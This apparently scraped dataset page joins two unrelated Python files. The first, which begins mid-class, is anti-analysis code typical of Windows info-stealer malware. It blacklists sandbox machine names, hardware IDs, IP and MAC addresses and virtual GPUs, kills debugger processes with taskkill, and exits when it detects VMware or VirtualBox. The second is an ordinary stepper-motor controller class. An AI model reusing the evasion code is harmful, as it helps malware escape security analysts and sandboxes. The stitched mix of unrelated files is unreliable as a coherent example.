self.blackListedPCNames = ["BEE7370C-8C0C-4","DESKTOP-NAKFFMT","WIN-5E07COS9ALR","B30F0242-1C6A-4","DESKTOP-VRSQLAG","Q9IATRKPRH","XC64ZB","DESKTOP-D019GDM","DESKTOP-WI8CLET","SERVER1","LISA-PC","JOHN-PC","DESKTOP-B0T93D6","DESKTOP-1PYKP29","DESKTOP-1Y2433R","WILEYPC","WORK","6C4E733F-C2D9-4","RALPHS-PC","DESKTOP-WG3MYJS","DESKTOP-7XC6GEZ","DESKTOP-5OV9S0O","QarZhrdBpj","ORELEEPC","ARCHIBALDPC","JULIA-PC","d1bnJkfVlH",]
self.blackListedHWIDS = ["7AB5C494-39F5-4941-9163-47F54D6D5016","032E02B4-0499-05C3-0806-3C0700080009","03DE0294-0480-05DE-1A06-350700080009","11111111-2222-3333-4444-555555555555","6F3CA5EC-BEC9-4A4D-8274-11168F640058","ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548","4C4C4544-0050-3710-8058-CAC04F59344A","00000000-0000-0000-0000-AC1F6BD04972","00000000-0000-0000-0000-000000000000","5BD24D56-789F-8468-7CDC-CAA7222CC121","49434D53-0200-9065-2500-65902500E439","49434D53-0200-9036-2500-36902500F022","777D84B3-88D1-451C-93E4-D235177420A7","49434D53-0200-9036-2500-369025000C65","B1112042-52E8-E25B-3655-6A4F54155DBF","00000000-0000-0000-0000-AC1F6BD048FE","EB16924B-FB6D-4FA1-8666-17B91F62FB37","A15A930C-8251-9645-AF63-E45AD728C20C","67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3","C7D23342-A5D4-68A1-59AC-CF40F735B363","63203342-0EB0-AA1A-4DF5-3FB37DBB0670","44B94D56-65AB-DC02-86A0-98143A7423BF","6608003F-ECE4-494E-B07E-1C4615D1D93C","D9142042-8F51-5EFF-D5F8-EE9AE3D1602A","49434D53-0200-9036-2500-369025003AF0","8B4E8278-525C-7343-B825-280AEBCD3BCB","4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27","79AF5279-16CF-4094-9758-F88A616D81B4",]
self.blackListedIPS = ["88.132.231.71","78.139.8.50","20.99.160.173","88.153.199.169","84.147.62.12","194.154.78.160","92.211.109.160","195.74.76.222","188.105.91.116","34.105.183.68","92.211.55.199","79.104.209.33","95.25.204.90","34.145.89.174","109.74.154.90","109.145.173.169","34.141.146.114","212.119.227.151","195.239.51.59","192.40.57.234","64.124.12.162","34.142.74.220","188.105.91.173","109.74.154.91","34.105.72.241","109.74.154.92","213.33.142.50",]
#
# incase you want => self.blackListedMacAddresses = ["b4:2e:99:c3:08:3c","00:15:5d:00:07:34","00:e0:4c:b8:7a:58","00:0c:29:2c:c1:21","00:25:90:65:39:e4","c8:9f:1d:b6:58:e4","00:25:90:36:65:0c","00:15:5d:00:00:f3","2e:b8:24:4d:f7:de","00:15:5d:13:6d:0c","00:50:56:a0:dd:00","00:15:5d:13:66:ca","56:e8:92:2e:76:0d","ac:1f:6b:d0:48:fe","00:e0:4c:94:1f:20","00:15:5d:00:05:d5","00:e0:4c:4b:4a:40","42:01:0a:8a:00:22","00:1b:21:13:15:20","00:15:5d:00:06:43","00:15:5d:1e:01:c8","00:50:56:b3:38:68","60:02:92:3d:f1:69","00:e0:4c:7b:7b:86","00:e0:4c:46:cf:01","42:85:07:f4:83:d0","56:b0:6f:ca:0a:e7","12:1b:9e:3c:a6:2c","00:15:5d:00:1c:9a","00:15:5d:00:1a:b9","b6:ed:9d:27:f4:fa","00:15:5d:00:01:81","4e:79:c0:d9:af:c3","00:15:5d:b6:e0:cc","00:15:5d:00:02:26","00:50:56:b3:05:b4","1c:99:57:1c:ad:e4","08:00:27:3a:28:73","00:15:5d:00:00:c3","00:50:56:a0:45:03","12:8a:5c:2a:65:d1","00:25:90:36:f0:3b","00:1b:21:13:21:26","42:01:0a:8a:00:22","00:1b:21:13:32:51","a6:24:aa:ae:e6:12","08:00:27:45:13:10",]
#
self.blackListedGPU = ["Microsoft Remote Display Adapter","Microsoft Hyper-V Video","Microsoft Basic Display Adapter","VMware SVGA 3D","Standard VGA Graphics Adapter","NVIDIA GeForce 840M","NVIDIA GeForce 9400M","UKBEHH_S","ASPEED Graphics Family(WDDM)","H_EDEUEK","VirtualBox Graphics Adapter","K9SC88UK","Стандартный VGA графический адаптер",]
threading.Thread(target=self.blockDebuggers).start()
for t in [self.listCheck, self.inVirtualenv, self.registryCheck, self.specsCheck, self.dllCheck, self.procCheck]:
x = threading.Thread(target=t)
self.processes.append(x)
for thread in self.processes:
thread.start()
for process in self.processes:
process.join()
def programExit(self):
self.running = False
self.__class__.inVM = True
def programKill(self, proc):
try:
os.system(f"taskkill /F /T /IM {proc}")
except Exception:
pass
def blockDebuggers(self) -> bool:
while self.running:
time.sleep(0.7)
for proc in psutil.process_iter():
for program in self.blackListedPrograms:
if proc.name().lower() == program:
self.programKill(program)
def listCheck(self) -> bool:
if os.path.exists(r'D:\Tools'):
self.programExit()
if os.path.exists(r'D:\OS2'):
self.programExit()
if os.path.exists(r'D:\NT3X'):
self.programExit()
myName = os.getlogin()
for user in self.blackListedUsers:
if myName == user:
self.programExit()
myPCName = os.getenv("COMPUTERNAME")
for pcName in self.blackListedPCNames:
if myPCName == pcName:
self.programExit()
myHWID = subprocess.check_output('wmic csproduct get uuid', stdin=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True).decode().split('\n')[1].strip()
for hwid in self.blackListedHWIDS:
if myHWID == hwid:
self.programExit()
try:
myIP = httpx.get("https://api64.ipify.org/").text.strip()
except (TimeoutError, httpx.ConnectError, httpx.ConnectTimeout):
pass
for ip in self.blackListedIPS:
if myIP == ip:
self.programExit()
process = subprocess.Popen("wmic path win32_VideoController get name", stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, shell=True)
myGPU = process.communicate()[0].decode().strip("Name\n").strip()
for gpu in self.blackListedGPU:
if myGPU == gpu:
self.programExit()
def inVirtualenv(self):
if getattr(sys, "base_prefix", None) or getattr(sys, "real_prefix", None) or sys.prefix != sys.prefix:
self.programExit()
def specsCheck(self) -> bool:
ram = str(psutil.virtual_memory()[0]/1024/1024/1024).split(".")[0]
if int(ram) <= 4:
self.programExit()
disk = str(psutil.disk_usage('/')[0]/1024/1024/1024).split(".")[0]
if int(disk) <= 50:
self.programExit()
if int(psutil.cpu_count()) <= 1:
self.programExit()
def registryCheck(self) -> bool:
reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")
reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")
if reg1 != 1 and reg2 != 1:
self.programExit()
handle = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
try:
reg_val = winreg.QueryValueEx(handle, '0')[0]
if "VMware" in reg_val or "VBOX" in reg_val:
self.programExit()
finally:
winreg.CloseKey(handle)
def dllCheck(self) -> bool:
vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")
if os.path.exists(vmware_dll):
self.programExit()
if os.path.exists(virtualbox_dll):
self.programExit()
def procCheck(self) -> bool:
processes = ['VMwareService.exe', 'VMwareTray.exe']
for proc in psutil.process_iter():
for program in processes:
if proc.name() == program:
self.programExit()
|
StepperMotor.py
|
##################################
## Author: Jakub Tomaszewski ##
## Stepper Motor Control Class ##
## Company: A4BEE ##
##################################
import subprocess
import yaml
import time
from threading import Thread
import logging
class stepper_motor:
def __init__(self, mapping_value = 1):
self.mapping_value = mapping_value
self.status = self.get_status()
self.current_position = self.get_current_position()
logging.info(f" Current position {int(self.current_position)}")
self.desired_position = int(self.current_position*self.mapping_value)
logging.info(f" Desired position {int(self.desired_position/mapping_value)}")
self.last_desired_position = self.current_position - 1
self.max_speed = self.status['Max speed']
self.starting_speed = self.status['Starting speed']
self.max_deceleration = self.status['Max deceleration']
self.max_acceleration = self.status['Max acceleration']
self.current_limit = self.status['Current limit']
logging.info(f" Mapping value: {self.mapping_value}")
logging.info(f" Max speed: {self.max_speed}")
logging.info(f" Starting speed: {self.starting_speed}")
logging.info(f" Max deceleration: {self.max_deceleration}")
logging.info(f" Max acceleration: {self.max_acceleration}")
logging.info(f" Current limit: {self.current_limit} \n\n")
self.move_th = Thread(target=self.__move, daemon=True)
self.move_th.start()
self.heart_th = Thread(target=self.__heartbeat, daemon=True)
self.heart_th.start()
def __ticcmd(self, *args):
# print("RUN: ", ['ticcmd'] + list(args))
return subprocess.check_output(['ticcmd'] + list(args))
# Return status of the motor
def get_status(self):
self.status = yaml.safe_load(self.__ticcmd('-s', '--full'))
return self.status
# Return the current position of the motor
def get_current_position(self):
status = yaml.safe_load(self.__ticcmd('-s', '--full'))
position = status['Current position']
self.current_position = int(position/self.mapping_value)
return self.current_position
# Set the new desired position
def set_desired_position(self, desired_position):
self.desired_position = int(desired_position*self.mapping_value)
# Function which move the motor to the desired position
def __move(self):
while True:
if self.last_desired_position != self.desired_position:
self.__ticcmd('--position', str(self.desired_position))
self.last_desired_position = self.desired_position
# Hear beat of the stepper motor
def __heartbeat(self):
while True:
# self.get_status()
self.__ticcmd('--reset-command-timeout')
time.sleep(0.1)
# Drive to limit switch
def home_sequence(self, dir):
if dir == "right":
self.__ticcmd('--home', str('rev'))
if dir == "left":
self.__ticcmd('--home', str('fwd'))
# Make the controller forget its current state.
def reset(self):
self.__ticcmd('--reset')
# Disable the motor driver.
def deenergize(self):
self.__ticcmd('--deenergize')
# Stop disabling the driver.
def energize(self):
self.__ticcmd('--energize')
# Set new max speed
def set_max_speed(self, max_speed):
self.max_speed = max_speed
self.__ticcmd('--max-speed', str(self.max_speed))
self.status = self.get_status()
logging.info(f" Max speed after changes: {self.status['Max speed']}")
# Set new starting speed
def set_starting_speed(self, starting_speed):
self.starting_speed = starting_speed
self.__ticcmd('--starting-speed', str(self.starting_speed))
self.status = self.get_status()
logging.info(f" Starting speed after changes: {self.status['Starting speed']}")
# Set new max acceleration
def set_max_acceleration(self, max_acceleration):
self.max_acceleration = max_acceleration
self.__ticcmd('--max-accel', str(self.max_acceleration))
self.status = self.get_status()
logging.info(f" Max acceleration after changes: {self.status['Max acceleration']}")
# Set new max deceleration
def set_max_deceleration(self, max_decelaration):
self.max_deceleration = max_decelaration
self.__ticcmd('--max-decel', str(self.max_deceleration))
self.status = self.get_status()
logging.info(f" Max deceleration after changes: {self.status['Max deceleration']}")
# Set new current limit
def set_current_limit(self, current_limit):
self.cuurent_limit = current_limit
self.__ticcmd('--current', str(current_limit))
self.status = self.get_status()
logging.info(f" Current limit after changes {self.status['Current limit']}")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.